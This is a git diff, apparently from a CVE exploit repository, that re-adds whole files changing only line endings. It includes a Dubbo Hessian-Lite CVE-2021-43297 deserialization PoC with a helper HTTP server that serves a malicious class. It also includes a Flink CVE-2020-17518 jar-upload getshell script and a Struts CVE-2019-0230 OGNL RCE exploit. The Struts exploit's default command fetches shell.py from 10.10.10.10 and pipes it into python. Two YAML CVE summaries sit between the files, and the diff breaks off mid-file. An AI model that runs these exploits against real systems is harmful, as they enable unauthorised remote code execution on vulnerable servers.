@@ -1,107 +1,107 @@ -import com.google.common.io.Files; -import com.sun.net.httpserver.Headers; -import com.sun.net.httpserver.HttpExchange; -import com.sun.net.httpserver.HttpHandler; -import com.sun.net.httpserver.HttpServer; -import com.sun.net.httpserver.spi.HttpServerProvider; -import java.io.BufferedReader; -import java.io.File; -import java.io.IOException; -import java.io.InputStreamReader; -import java.io.OutputStream; -import java.net.InetSocketAddress; -import java.util.Iterator; -import java.util.List; -import java.util.Set; -import org.apache.commons.lang3.StringUtils; - -/** - * 解析http协议,输出http请求体 - * - * @author xuanyh - */ -public class HTTPServer { - - public static String filePath; - public static int PORT = 8080; - public static String contentType; - - public static void main(String[] args) throws IOException { - run(args); - } - - public static void run(String[] args) { - int port = PORT; - String context = "/"; - String clazz = "Calc.class"; - if (args != null && args.length > 0) { - port = Integer.parseInt(args[0]); - context = args[1]; - clazz = args[2]; - } - HttpServerProvider provider = HttpServerProvider.provider(); - HttpServer httpserver = null; - try { - httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); - } catch (IOException e) { - e.printStackTrace(); - } - //监听端口8080, - - httpserver.createContext(context, new RestGetHandler(clazz)); - httpserver.setExecutor(null); - httpserver.start(); - System.out.println("server started"); - } - - static class RestGetHandler implements HttpHandler { - - private String clazz; - - public RestGetHandler(String clazz) { - this.clazz = clazz; - } - - @Override - public void handle(HttpExchange he) throws IOException { - String requestMethod = he.getRequestMethod(); - System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( - StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" - : "?" 
+ he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); - if (requestMethod.equalsIgnoreCase("GET")) { - Headers responseHeaders = he.getResponseHeaders(); - responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); - - he.sendResponseHeaders(200, 0); - // parse request - OutputStream responseBody = he.getResponseBody(); - Headers requestHeaders = he.getRequestHeaders(); - Set keySet = requestHeaders.keySet(); - Iterator iter = keySet.iterator(); - - while (iter.hasNext()) { - String key = iter.next(); - List values = requestHeaders.get(key); - String s = key + ": " + values.toString(); - System.out.println(s); - } - System.out.println(); - BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); - StringBuilder stringBuilder = new StringBuilder(); - String line; - for (;(line = bufferedReader.readLine()) != null;) { - stringBuilder.append(line); - } - System.out.println(stringBuilder.toString()); - -// byte[] bytes = Files.toByteArray(new File(filePath == null ? 
HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); - - byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); - System.out.println(new String(bytes, 0, bytes.length)); - // send response - responseBody.write(bytes); - responseBody.close(); - } - } - } +import com.google.common.io.Files; +import com.sun.net.httpserver.Headers; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpHandler; +import com.sun.net.httpserver.HttpServer; +import com.sun.net.httpserver.spi.HttpServerProvider; +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.util.Iterator; +import java.util.List; +import java.util.Set; +import org.apache.commons.lang3.StringUtils; + +/** + * 解析http协议,输出http请求体 + * + * @author xuanyh + */ +public class HTTPServer { + + public static String filePath; + public static int PORT = 8080; + public static String contentType; + + public static void main(String[] args) throws IOException { + run(args); + } + + public static void run(String[] args) { + int port = PORT; + String context = "/"; + String clazz = "Calc.class"; + if (args != null && args.length > 0) { + port = Integer.parseInt(args[0]); + context = args[1]; + clazz = args[2]; + } + HttpServerProvider provider = HttpServerProvider.provider(); + HttpServer httpserver = null; + try { + httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); + } catch (IOException e) { + e.printStackTrace(); + } + //监听端口8080, + + httpserver.createContext(context, new RestGetHandler(clazz)); + httpserver.setExecutor(null); + httpserver.start(); + System.out.println("server started"); + } + + static class RestGetHandler implements HttpHandler { + + private String clazz; + + public RestGetHandler(String clazz) { + this.clazz = clazz; + } + + @Override + public void 
handle(HttpExchange he) throws IOException { + String requestMethod = he.getRequestMethod(); + System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( + StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" + : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); + if (requestMethod.equalsIgnoreCase("GET")) { + Headers responseHeaders = he.getResponseHeaders(); + responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); + + he.sendResponseHeaders(200, 0); + // parse request + OutputStream responseBody = he.getResponseBody(); + Headers requestHeaders = he.getRequestHeaders(); + Set keySet = requestHeaders.keySet(); + Iterator iter = keySet.iterator(); + + while (iter.hasNext()) { + String key = iter.next(); + List values = requestHeaders.get(key); + String s = key + ": " + values.toString(); + System.out.println(s); + } + System.out.println(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); + StringBuilder stringBuilder = new StringBuilder(); + String line; + for (;(line = bufferedReader.readLine()) != null;) { + stringBuilder.append(line); + } + System.out.println(stringBuilder.toString()); + +// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); + + byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); + System.out.println(new String(bytes, 0, bytes.length)); + // send response + responseBody.write(bytes); + responseBody.close(); + } + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java index 04f8ed45f19ec0a78a4a98512438a990b0edff8a..0f0eddc9aca91d2dc71ee145bb1a5013e9cf3fb2 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java 
@@ -1,133 +1,133 @@ -package com.bitterz.dubbo; - -import com.alibaba.com.caucho.hessian.io.Hessian2Output; -import org.apache.dubbo.common.io.Bytes; -import org.apache.xbean.naming.context.ContextUtil; -import org.apache.xbean.naming.context.WritableContext; -import sun.reflect.ReflectionFactory; - -import javax.naming.Context; -import javax.naming.Reference; -import java.io.ByteArrayOutputStream; -import java.io.OutputStream; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.lang.reflect.InvocationTargetException; -import java.net.Socket; -import java.util.HashSet; -import java.util.Random; -public class HessianLitePoc { - - public static void main(String[] args) throws Exception { - - Context ctx = Reflections.createWithoutConstructor(WritableContext.class); - Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); - ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); - -// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); -// fullName.setAccessible(true); - Reflections.setFieldValue(binding, "fullName", "<<<<<"); -// fullName.set(binding, "<<<<<"); // 方便定位属性值的 - - - - byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; - //############################################################################################ - // 写入binding - ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); - Hessian2Output outBinding = new Hessian2Output(binding2bytes); - outBinding.writeObject(binding); - outBinding.flushBuffer(); - //############################################################################################ - // binding序列化后的byte数组 - byte[] bindingBytes = binding2bytes.toByteArray(); - - // header. - byte[] header = new byte[16]; - // set magic number. - Bytes.short2bytes((short) 0xdabb, header); - // set request and serialization flag. 
- header[2] = (byte) ((byte) 0x80 | 0x20 | 2); - // set request id. - Bytes.long2bytes(new Random().nextInt(100000000), header, 4); - // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 - Bytes.int2bytes(bindingBytes.length*2-1, header, 12); - - // 收集header+binding - ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); - byteArrayOutputStream.write(header); - byteArrayOutputStream.write(bindingBytes); - byte[] bytes = byteArrayOutputStream.toByteArray(); - - //############################################################################################ - // 组装payload = header+binding+binding - byte[] payload = new byte[bytes.length + bindingBytes.length -1]; - for (int i = 0; i < bytes.length; i++) { - payload[i] = bytes[i]; - } - - for (int i = 0; i < bindingBytes.length; i++) { - payload[i + bytes.length-1] = bindingBytes[i]; - } - //############################################################################################ - - // 修改flag的值 - payload[2] = 0x02; - - // 输出字节流的十六进制 - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - } - System.out.println(); - // 输出byte数组转String - System.out.println(new String(payload,0,payload.length)); -// System.exit(1); - //todo 此处填写被攻击的dubbo服务提供者地址和端口 - Socket socket = new Socket("127.0.0.1", 20880); - OutputStream outputStream = socket.getOutputStream(); - outputStream.write(payload); - outputStream.flush(); - outputStream.close(); - System.out.println("\nsend!!"); - } - - - public static class Reflections{ - public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ - Field field=null; - Class cl = obj.getClass(); - while (cl != Object.class){ - try{ - field = cl.getDeclaredField(fieldName); - if(field!=null){ - break;} - } - catch (Exception e){ - cl = cl.getSuperclass(); - } - } - if (field==null){ - 
System.out.println(obj.getClass().getName()); - System.out.println(fieldName); - } - field.setAccessible(true); - field.set(obj,fieldValue); - } - - public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); - } - - public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - objCons.setAccessible(true); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - sc.setAccessible(true); - return (T) sc.newInstance(consArgs); - } - } +package com.bitterz.dubbo; + +import com.alibaba.com.caucho.hessian.io.Hessian2Output; +import org.apache.dubbo.common.io.Bytes; +import org.apache.xbean.naming.context.ContextUtil; +import org.apache.xbean.naming.context.WritableContext; +import sun.reflect.ReflectionFactory; + +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.net.Socket; +import java.util.HashSet; +import java.util.Random; +public class HessianLitePoc { + + public static void main(String[] args) throws Exception { + + Context ctx = Reflections.createWithoutConstructor(WritableContext.class); + Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); + ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); + +// Field fullName = 
binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); +// fullName.setAccessible(true); + Reflections.setFieldValue(binding, "fullName", "<<<<<"); +// fullName.set(binding, "<<<<<"); // 方便定位属性值的 + + + + byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; + //############################################################################################ + // 写入binding + ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); + Hessian2Output outBinding = new Hessian2Output(binding2bytes); + outBinding.writeObject(binding); + outBinding.flushBuffer(); + //############################################################################################ + // binding序列化后的byte数组 + byte[] bindingBytes = binding2bytes.toByteArray(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. + header[2] = (byte) ((byte) 0x80 | 0x20 | 2); + // set request id. 
+ Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 + Bytes.int2bytes(bindingBytes.length*2-1, header, 12); + + // 收集header+binding + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(bindingBytes); + byte[] bytes = byteArrayOutputStream.toByteArray(); + + //############################################################################################ + // 组装payload = header+binding+binding + byte[] payload = new byte[bytes.length + bindingBytes.length -1]; + for (int i = 0; i < bytes.length; i++) { + payload[i] = bytes[i]; + } + + for (int i = 0; i < bindingBytes.length; i++) { + payload[i + bytes.length-1] = bindingBytes[i]; + } + //############################################################################################ + + // 修改flag的值 + payload[2] = 0x02; + + // 输出字节流的十六进制 + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + } + System.out.println(); + // 输出byte数组转String + System.out.println(new String(payload,0,payload.length)); +// System.exit(1); + //todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(payload); + outputStream.flush(); + outputStream.close(); + System.out.println("\nsend!!"); + } + + + public static class Reflections{ + public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ + Field field=null; + Class cl = obj.getClass(); + while (cl != Object.class){ + try{ + field = cl.getDeclaredField(fieldName); + if(field!=null){ + break;} + } + catch (Exception e){ + cl = cl.getSuperclass(); + } + } + if (field==null){ + System.out.println(obj.getClass().getName()); + System.out.println(fieldName); + } + 
field.setAccessible(true); + field.set(obj,fieldValue); + } + + public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + + public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + objCons.setAccessible(true); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + sc.setAccessible(true); + return (T) sc.newInstance(consArgs); + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md index b47312f306aac28ea8981afbad6fcf560b0032d6..f39e0a8e4b03752ef3db020914fa166386e4a77f 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md @@ -1,5 +1,5 @@ -漏洞描述 - -Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 -Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 +漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b6d6d0252ca4fe88fa923903c93239c54..2f25d5eec3f28427bb898b15c91003501b5486a9 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml 
@@ -1,20 +1,20 @@
-id: CVE-2021-25641
-source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
-info:
- name: Dubbo是一个高性能优秀的服务框架。
- severity: CRITICAL
- description: |
- 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。
- scope-of-influence:
- Dubbo 2.5.0 - 2.6.9
- Dubbo 2.7.0 - 2.7.8
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-25641
- cwe-id: CWE-502
- cnvd-id: None
- kve-id: None
+id: CVE-2021-25641
+source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
+info:
+ name: Dubbo是一个高性能优秀的服务框架。
+ severity: CRITICAL
+ description: |
+ 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。
+ scope-of-influence:
+ Dubbo 2.5.0 - 2.6.9
+ Dubbo 2.7.0 - 2.7.8
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-25641
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
 tags: cve2021, Apache Dubbo
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
index 1ba752b3e75dfa30047abf05aebfe1b231f0d1b6..c37c98d4e8ae33409bf1c15ff8620489ec3bb90a 100644
--- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
+++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml
@@ -1,20 +1,20 @@ -id: CVE-2021-43297 -source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 -info: - name: Dubbo是一个高性能优秀的服务框架。 - severity: CRITICAL - description: | - Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 - scope-of-influence: - Dubbo Hessian-Lite ≤ 3.2.11 - reference: - - https://help.aliyun.com/document_detail/390193.html - - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-43297 - cwe-id: CWE-502 - cnvd-id: None - kve-id: None +id: CVE-2021-43297 +source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: CRITICAL + description: | + Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 + scope-of-influence: + Dubbo Hessian-Lite ≤ 3.2.11 + reference: + - https://help.aliyun.com/document_detail/390193.html + - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-43297 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None tags: cve2021, 数据泄漏 \ No newline at end of file diff --git a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py old mode 100755 new mode 100644 index c78850f56052de474bf975d7cd34e6fa95663b89..d3d4caa32e1494b672977b4f9f319e9b89d51fa4 --- a/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py +++ b/cve/apache-Flink/2020/CVE-2020-17518/CVE-2020-17518.py 
@@ -1,30 +1,30 @@ -import requests -import base64 -import json -import sys -import cStringIO -#jar_code="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" -def main(): - if len(sys.argv) == 1 or sys.argv[1] == '-h': - print('Usage :python2 flink-getshell.py http://example.com:8081') - exit() - url = sys.argv[1] - jobmanager_config_dir = url + '/jobmanager/config' - upload_jar_url = url + "/jars/upload" - r1 = requests.get(jobmanager_config_dir,verify=False) - #data = json.loads(req.text)[2]['value'] - data = json.loads(r1.text) - for i in data: - #print(i['key']) - if i['key'] == "web.tmpdir": - flink_webdir = i['value'] - print("webdir:%s" % flink_webdir) - file_content = base64.b64decode('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') - files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 'application/octet-stream')} - r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) - print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) - -if __name__ == "__main__": - main() - - +import requests +import base64 +import json +import sys +import cStringIO +#jar_code="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" +def main(): + if len(sys.argv) == 1 or sys.argv[1] == '-h': + print('Usage :python2 flink-getshell.py http://example.com:8081') + exit() + url = sys.argv[1] + jobmanager_config_dir = url + '/jobmanager/config' + upload_jar_url = url + "/jars/upload" + r1 = requests.get(jobmanager_config_dir,verify=False) + #data = json.loads(req.text)[2]['value'] + data = json.loads(r1.text) + for i in data: + #print(i['key']) + if i['key'] == "web.tmpdir": + flink_webdir = i['value'] + print("webdir:%s" % flink_webdir) + file_content = base64.b64decode('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') + files = {'jarfile': ('../../../../../..%s/flink-web-upload/new1.jar' % flink_webdir, cStringIO.StringIO(file_content), 
'application/octet-stream')} + r2 = requests.post(upload_jar_url, files=files, timeout=30, verify=False) + print('the shell:%s/jars/new1.jar/run?entry-class=Execute&program-args="command"' % url) + +if __name__ == "__main__": + main() + + diff --git a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py index 1551ebacf75d0e0593f930cffcb3d6377d2b2f80..856fc4fc4e8046d89f931c09ea577aec9b3c63e2 100644 --- a/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py +++ b/cve/apache-Struts/2019/CVE-2019-0230/CVE-2019-0230.py 
@@ -1,163 +1,163 @@ -# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation -# Date: 08/18/2020 -# Exploit Author: West Shepherd -# Vendor Homepage: https://struts.apache.org/download.cgi -# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) -# CVE : CVE-2019-0230 -# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. -# Source(s): -# https://github.com/PrinceFPF/CVE-2019-0230 -# https://cwiki.apache.org/confluence/display/WW/S2-059 -# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 - -# !/usr/bin/python -from sys import argv, exit, stdout, stderr -import argparse -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -import logging - - -class Exploit: - def __init__( - self, - target='', - redirect=False, - proxy_address='' - ): - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - self.target = target - self.session = requests.session() - self.redirect = redirect - self.timeout = 0.5 - self.proxies = { - 'http': 'http://%s' % proxy_address, - 'https': 'http://%s' % proxy_address - } \ - if proxy_address is not None \ - and proxy_address != '' else {} - self.query_params = {} - self.form_values = {} - self.cookies = {} - boundary = "---------------------------735323031399963166993862150" - self.headers = { - 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, - 'Accept': '*/*', - 'Connection': 'close' - } - payload = "%{(#nike='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?(#_memberAccess=#dm):" \ - -"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." -\ - -"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." -\ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." 
\ - -"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." -\ - -"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new -java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ - -"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." -\ - -"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." -\ - "(#ros.flush())}" - - self.payload = "--%s\r\nContent-Disposition: form-data; -name=\"foo\"; " \ - "filename=\"%s\0b\"\r\nContent-Type: -text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" % ( - boundary, payload, boundary - ) - - def do_get(self, url, params=None, data=None): - return self.session.get( - url=url, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - data=data, - params=params - ) - - def do_post(self, url, data=None, params=None): - return self.session.post( - url=url, - data=data, - verify=False, - allow_redirects=self.redirect, - headers=self.headers, - cookies=self.cookies, - proxies=self.proxies, - params=params - ) - - def debug(self): - try: - import http.client as http_client - except ImportError: - import httplib as http_client - http_client.HTTPConnection.debuglevel = 1 - logging.basicConfig() - logging.getLogger().setLevel(logging.DEBUG) - requests_log = logging.getLogger("requests.packages.urllib3") - requests_log.setLevel(logging.DEBUG) - requests_log.propagate = True - return self - - def send_payload(self, command='curl --insecure -sv -https://10.10.10.10/shell.py|python -'): - url = self.target - stdout.write('sending payload to %s payload %s' % (url, command)) - resp = self.do_post(url=url, params=self.query_params, -data=self.payload.replace('{COMMAND}', command)) - return resp - - -if __name__ == '__main__': - parser = argparse.ArgumentParser(add_help=True, - description='CVE-2020-0230 Struts -2 exploit') - try: - parser.add_argument('-target', 
action='store', help='Target -address: http(s)://target.com/index.action') - parser.add_argument('-command', action='store', - help='Command to execute: touch /tmp/pwn') - parser.add_argument('-debug', action='store', default=False, -help='Enable debugging: False') - parser.add_argument('-proxy', action='store', default='', -help='Enable proxy: 10.10.10.10:8080') - - if len(argv) == 1: - parser.print_help() - exit(1) - options = parser.parse_args() - - exp = Exploit( - proxy_address=options.proxy, - target=options.target - ) - - if options.debug: - exp.debug() - stdout.write('target %s debug %s proxy %s\n' % ( - options.target, options.debug, options.proxy - )) - - result = exp.send_payload(command=options.command) - stdout.write('Response: %d\n' % result.status_code) - - except Exception as error: - +# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation +# Date: 08/18/2020 +# Exploit Author: West Shepherd +# Vendor Homepage: https://struts.apache.org/download.cgi +# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059) +# CVE : CVE-2019-0230 +# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF. 
+# Source(s): +# https://github.com/PrinceFPF/CVE-2019-0230 +# https://cwiki.apache.org/confluence/display/WW/S2-059 +# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22 + +# !/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +import logging + + +class Exploit: + def __init__( + self, + target='', + redirect=False, + proxy_address='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.target = target + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.query_params = {} + self.form_values = {} + self.cookies = {} + boundary = "---------------------------735323031399963166993862150" + self.headers = { + 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, + 'Accept': '*/*', + 'Connection': 'close' + } + payload = "%{(#nike='multipart/form-data')." \ + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ + "(#_memberAccess?(#_memberAccess=#dm):" \ + +"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." +\ + +"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." +\ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}')." \ + +"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." +\ + +"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new +java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." \ + +"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse()." 
